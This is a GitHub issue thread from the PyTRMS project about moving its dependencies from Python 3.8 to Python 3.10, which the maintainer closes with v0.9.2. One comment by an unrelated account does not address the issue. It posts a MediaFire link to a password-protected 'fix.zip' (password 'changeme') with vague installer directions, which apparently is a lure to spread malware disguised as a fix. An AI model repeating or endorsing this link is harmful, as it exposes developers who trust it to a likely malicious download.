### ISSUE TITLE
update all dependencies to support Python 3.10

### ISSUE THREAD

**Issue by lefi7z** [ionicon-analytik/PyTRMS#6]
we're always looking to provide a stable version, hence we have been sticking to Python 3.8 as official recommendation.

However, this is also right now the lowest supported version and will be soon discontinued. 
The version jump to 3.10 needs to be done and tested, esp. for packages like numpy that are prone to deny installation under Windows.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lefi7z** [comment]
Closed with v0.9.2
